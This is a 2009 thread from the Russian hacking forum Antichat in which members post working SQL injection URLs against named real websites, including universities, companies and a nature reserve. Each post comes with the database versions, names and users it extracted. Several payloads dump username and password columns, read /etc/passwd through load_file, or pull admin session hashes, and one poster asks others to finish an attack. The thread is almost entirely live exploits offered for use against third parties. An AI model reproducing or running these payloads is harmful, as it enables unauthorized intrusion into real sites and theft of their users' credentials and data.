ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

RazyKK 13.08.2009 05:11

http://www.dhcottages.co.uk/details.php?id=35+UNION+SELECT+1,2,3,4,CONCAT(vers ion(),database(),user()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2+LIMIT+1,1--

Database Version: 4.1.22-community-nt-log
Database name: dch_admin
User name: Ravine@DSVR009974

-JC- 13.08.2009 08:56

MSSQL-Inj:
Код:

http://www.right-travel.com/travel_tips.php?id=1%27+or+1=@@version+--+

beerhack 13.08.2009 11:06

PR3 тиц100
Код:

http://www.nerungri.edu.ru/muuo/web/3/admin/index.php?page=edit&id=-8+union+select+1,2,3,4,concat_ws(0x3a,username,email,password),6,7,8,9,0,11+from+antoria.jos_users/*
Database Version: 5.0.32-Debian_7etch10-log
Database name: history
User name: admin@localhost

Swift 13.08.2009 11:41

Цитата:

http://www.salsamoves.info/clubNight.php?clubNightID=38+union+select+1,concat (0x2a,version(),database(),user()),3,4,5,6,7,8,9,1 0,11,12,13+limit+1,1/*
4.1.22-standardsalsamov_londonsalsasalsamov@localhost

+++AndreyDevil+++ 13.08.2009 15:16

http://www.dbq.edu/news/news1.cfm?ID=423+union+select+1,2,3,4,5,6,7,8,9,10 +from+release%00

Microsoft Access

mailbrush 13.08.2009 17:38

Код:

http://www.1cleaning.ru/rus/sc.php?id=-29+union+select+1,concat_ws(0x3a,user(),database(),version()),3--
Код:

u19949@78.108.81.31:b19949:5.0.67

Swift 13.08.2009 18:25

Цитата:

http://www.djz.edu.my/hjdaobao/hj.php?period=7+union+select+1,2,concat(0x3a,versi on(),user(),database()),4,5,6,7
4.1.22-standarddjzedumy_daobao@localhostdjzedumy_daobao

xa-xa89 13.08.2009 18:34

Код:

http://veganica.com/artists.php?typeid=1%27+and+substring(version(),1,1)=4+/*
Код:

http://www.buywacomthai.com/th/catalog.php?typeid=3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6+--+-

Skofield 13.08.2009 19:07

PR 8

http://www.ncsu.edu/jcraulstonarboretum/calendar/event_details.php?ID=-248+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,34/*

Database Version: 4.1.19-log
Database name: arboretum
User name: arbread@uni48ws.unity.ncsu.edu

-----------------------------------------------------------------------------------------------------------------

PR 6

http://www.cals.ncsu.edu/poultry/staff.php?content=Jim_Croom&id=-44+union+select+1,group_concat(username,0x3a,passw ord),3,4,5,6,7,8,9,0,11+from+user/*

Database Version: 4.1.19-log
Database name: ps_cms
User name: ps_cms_admin@uni47ws.unity.ncsu.edu

--------------------------------------------------------------------------------------------------------------------------

PR 4

http://omega.physics.uiowa.edu/DOE06/Pages/Page.php?Id=-2+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*

Database Version: 4.1.22
Database name: DOE_WEB
User name: root@localhost

---------------------------------------------------------------------------------------------------------------------------------

PR 4

http://genetics.uiowa.edu/people/detail.php?id=-143+union+select+version(),2,3,4,5,6,7,8,9,0,1,12/*

Skofield 13.08.2009 23:10

PR 4

http://csbl.bmb.uga.edu/uber/display_species.php?id=-82+union+select+version()/*

Database Version: 4.0.18
Database name: Uber
User name: uber@csbl.bmb.uga.edu

Swift 13.08.2009 23:53

Цитата:

http://www.film-commission-bayern.de/index.php?SeitenID=12+union+select+1,2,3,4,5,6,con cat_ws(0x2a,version(),database(),user()),8,9,10
5.0.32-Debian_7etch8-log*fff_location*fff_location_w@localhost


Цитата:

http://www.maarav.org.il/classes/PUItem.php?id=127+union+select+1,2,concat(0x3a,ver sion(),user(),database()),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+limit+1,1

-communitymaaravo_maarav5@localhostmaaravo_maarav5

Skofield 14.08.2009 01:26

PR 5

http://bethhart.org/band.php?id=3+union+select+1,version(),3,4,5,6,7--

Database Version: 5.0.67-community-log
Database name: bethhart_com_site
User name: hartmass@bethhart.com

z00MAN 14.08.2009 01:35

Код:

http://www.stanki43.ru/index.php?id=-14+union+select+1,2,3,unhex(hex(version())),5,6,7--
4.1.18-log:stanki43:teho_us1@localhost

Skofield 14.08.2009 02:21

PR 4
http://ukrainianlawfirms.com/firms.php?id=-023+union+select+1,version(),3,4,5/*

Database Version: 5.0.44-log
Database name: ukrainianlaw
User name: u_ukr_law@localhost

-----------------------------------------------------------------------------------------------------------------

http://www.mightbegood.net/fluent/linkcat.php?id=2+union+select+version(),2,3--

Database Version: 5.0.81-community-log
Database name: fluentco_fluent
User name: fluentco_admin@localhost

Swift 14.08.2009 10:40

Цитата:

http://www.gtk.fi/slr/printable.php?id=18+union+select+1,concat_ws(0x2a, version(),database(),user()),3,4,5,6,7,8,9,10,11+l imit+1,1

5.0.45 slr slr@localhost

diGriz 14.08.2009 12:13

Код:

http://www.cacma.org/index.php?c=noti.php&id=-79+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16--
web17_db1:5.0.20-Debian_1-log:web17_u1@localhost

Код:

http://www.vistazo.com/webpages/pais/index.php?id=-6641+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
vistazoc_9:4.1.22-standard:vistazoc_admin@localhost

Swift 14.08.2009 13:03

Цитата:

http://www.tparazitolderg.org/similar.php3?id=102+union+select+1,concat(0x3a,ver sion(),user(),database())+limit+1,1
Цитата:

http://travel.chinavista.com/talk/view.php3?Itemid=189+union+select+1,concat_ws(0x2a ,version(),database(),user()),3,4,5,6,7,8,9,10,11, 12+limit+1,1

5.0.45 Forum dedop@localhost

Skofield 14.08.2009 14:06

http://www.utahstorytellingguild.org/chapters.php?id=-8+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9+from+mysql.user/*

Database Version: 4.1.22
Database name: usg
User name: barryw@localhost

HAXTA4OK 14.08.2009 18:36

http://www.ledoux.com.uy/productos_ing.php?id=1&cod=-31+union+select+1,2,concat_Ws(0x3a,user(),database (),version()),4,5,6,7--

ledoux_ledoux@localhost:ledoux_ledoux:5.0.67-community

Skofield 14.08.2009 21:48

http://www.optiputer.net/events/presentation_temp.php?id=11+union+select+1,2,3,4,5 ,6,version(),8,9,0,1,2,3,4,15+from+mysql.user/*
Database Version: 4.0.27
Database name: calit
User name: calit2user@localhost

RazyKK 14.08.2009 21:59

http://www.cambridgefolkfestival.co.uk/artists/biographies.php?id=35+union+select+1,concat(versio n(),database(),user()),3,4,5--

database Version: 4.1.22
database name: cambridgefolk
user name: cambridgefolk@localhost

http://www.activeagency.co.uk/artist.php?id=35+union+select+1,concat(version(),d atabase(),user()),3,4,5,6,7,8,9,10,11--
database Version: 5.0.81-community
database name: fran_activeagency
user name: fran_franaa@localhost

z00MAN 14.08.2009 23:09

Код:

http://www.arpi-sibir.ru/seminar.php?id=-15'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8/*
arpi@localhost:5.0.45:arpi_sibir



Код:

http://www.izmiran.rssi.ru/catalog?id=-15+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),version(),database()))),4--
catalog@localhost:4.1.14:catalog



Код:

http://www.psychiatry.ru/lib_show.php?id=15+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6--
yfilehljv_ncpz@212.193.224.10:4.1.22:yfilehljv_ncp z

zifanchuck 15.08.2009 00:43

www.sovtest.ru
Цитата:

http://www.sovtest.ru/news.php?id=-197+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8--
Версия 4.1.18-standard-log

П.С вывод в сааамом низу страницы

========================


www.astrakhanfm.ru
Цитата:

http://www.astrakhanfm.ru/news/news.php?id=-15942+union+select+1,2,3,4,version(),6,7--
Версия 4.0.24-stan

Skofield 15.08.2009 02:10

Код:

http://www.mmaspot.net/news.php?id=-605'+union+select+1,version(),3,4,5,6,7+from+user/*
Database Version: 5.0.45
Database name: mmaspot_vb
User name: mmaspot_vb@localhost

---------------------------------------------------------------------------------------------------------

PR 7
Код:

http://www.arthistoricum.net/index.php?id=276&ausgabe=2009_07&review_id=-13611+union+select+version()/*
Database Version: 5.0.44
Database name: usr_p101264_2
User name: p101264d2@172.17.110.14

Hack_ERR++ 15.08.2009 03:06

Код:

http://www.radmarkt.de/rm/content/home/news.php?id=-974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
User = bva_radmarkt@hera.bva-bielefeld.de
Database = bva_radmarkt
Version = 4.1.20

-JC- 15.08.2009 05:11

Код:

http://udmurtiya.org/view.php?id=-1%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+

Noizless 15.08.2009 09:03

Код:

http://atn.kharkov.ua/gallery_view.php?idf=-267+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--
Database Version: 5.0.45-log
Database name: site
User name: atn@localhost

Код:

http://vecherniy.kharkov.ua/archive_paper/?y=2009&n=-89+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.51a-24-log
Database name: newvecherka
User name: u_newvecherk@localhost

Swift 15.08.2009 12:58

Цитата:

http://www.worldsteel.org/?action=faqlist&id=6+union+select+1,2,concat(0x2a, version(),database(),user()),4,5,6/*
version:4.1.20
database:admin_appl
user:worldsteelorg@localhost

Цитата:

http://www.mybart.org/about_mybart/refer/index.php?s=about_mybart_nav&destid=1+union+select +1,2,aes_decrypt(aes_encrypt(concat_ws(0x2a,versio n(),database(),user()),0x71),0x71),4,5,6,7,8,9,10, 11,12,13,14,15,16+limit+1,1/*
version:5.0.18
database:log mybart
user:mail@10.10.11.73

edge911 15.08.2009 14:18

Цитата:

http://vesti.portal.kharkov.ua/vesti.php?item=-1%27+union+select+1,version(),3,4,5,6,7,8,9%20%27--
Database Version: 5.1.28-rc

BHYCHIK 15.08.2009 20:07

Сайт природного заповедника Куркино http://www.oopt-kurkino.ru/

Уязвимый скрипт: http://www.oopt-kurkino.ru/p8/index.php?r=news&nid=223+and+0+union+select+1,2,3, 4,5,6,7,8,9,10--+

Версия БД: 5.0.45
Имя БД: oopt_kurkino_ru
Юзер: ooptkurkinoru@localhost
ОС: redhat-linux-gnu
File_priv: нет
Доступ к mysql.user: нет

Информация об админе:
http://www.oopt-kurkino.ru/p8/index.php?r=news&nid=223+and+0+union+select+1,2,co ncat_ws(0x3a,hash,last,ip,c),4,5,6,7,8,9,10+from+c ns_adminsessions--+

rushter 15.08.2009 20:08

http://www.hankookfa.com/view.php?num=-418+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9/*
pr2

Swift 15.08.2009 20:19

http://www.ipcc.cma.gov.cn/Website/index.php?WCHID=30+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,version(),user(),database()),0x7 1),0x71),2,3,4/*

5.0.18root@localhostipcc_cma_gov_cn

ILYAtirtir 16.08.2009 00:18

Razzie Awards(Официальный сайт премии «Золотая малина»)

MS Access

Цитата:

http://razzies.com/asp/directory/XcDirViewRatings.asp?LinkID=1193+union+select+null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null+from+????
Скуля есть,но какие там таблицы хз. Знаю что стоит XcNewsPlus,так же есть web wiz forum,но его таблицы в другой базе,так что тоже надо подбирать.Если кто сможет,раскрутите)

nemaniak 16.08.2009 03:17

PR3

Код:

http://www.sgb-cisl.it/sites/wir_gremiumdetails.php?lang=de&id_gremienkategorie=-1+and+1=1+UNION+SELECT+concat_ws(0x3a,version(),user(),database())
5.0.45-log:sgbcisl@localhost:sgbcisl

mol0t 16.08.2009 12:56

Код:

http://www.unitedland.ru/news.php?id=-6+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4--
caption_land:5.0.81-community:caption_merk@localhost


Код:

http://www.elios-nsk.ru/prod_info.php?id=-9640+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--
inetsruq_elios:5.0.81-community-log:inetsruq_elios@localhost

BHYCHIK 16.08.2009 16:27

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,3--+

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,co ncat_ws(0x3a,user(),version(),database(),@@version _compile_os)--+

User:dart@localhost
database:dartklient
version:5.0.58-log
OS:redhat-linux-gnu
доступ к mysql.user: нет
file_priv: нет

Noizless 16.08.2009 19:49

Код:

http://www.tan-jurist.ru/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10--
Database Version: 5.0.67-log
Database name: u25507
User name: u25507@10.10.223.201

BHYCHIK 16.08.2009 20:18

http://www.uvic.ee/prodfull.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

Database(): d1894sd5697
User(): d1894sa9657@z135.zone.ee
Version(): 5.1.35
OS: unknown-linux-gnu
File_priv: Нет
Доступ к mysql.user: Нет

Интересные таблицы не нашел. Доступ к админке ограничен через .htaccess
http://www.uvic.ee/admin

Assembler 16.08.2009 20:22

http://www.ru-host.ru/next.php?id=3-3%20union%20select%201,group_concat(column_name)%2 0from%20information_schema.columns%20where%20table _name=0x686f73745f6e657773--

Хостер =) 5 версия...

Джокестар, если боян минус не ставь... Антибоян не работает временно

mailbrush 16.08.2009 20:26

Код:

http://www.subco.org/sc.php?src=entry&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13/*
Код:

subco@localhost:subco:5.0.45
Код:

http://www.norvellgroup.com/property-offered-charleston-sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5
Код:

norvell_cms@localhost:norvell_cms:4.1.22-standard-log
Код:

http://209.172.57.37:8080/smsmanager/smsuser/welcome.jsp?np=addressbook&v=2&KEYID=-1+union+select+1,2,3,4,5,6
Код:

http://www.clontarfflorist.com/shopping/sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5
Код:

clonta1_doug@web9.hosting365.ie:clonta1_SHOP:5.0.45-community-log


Время: 19:08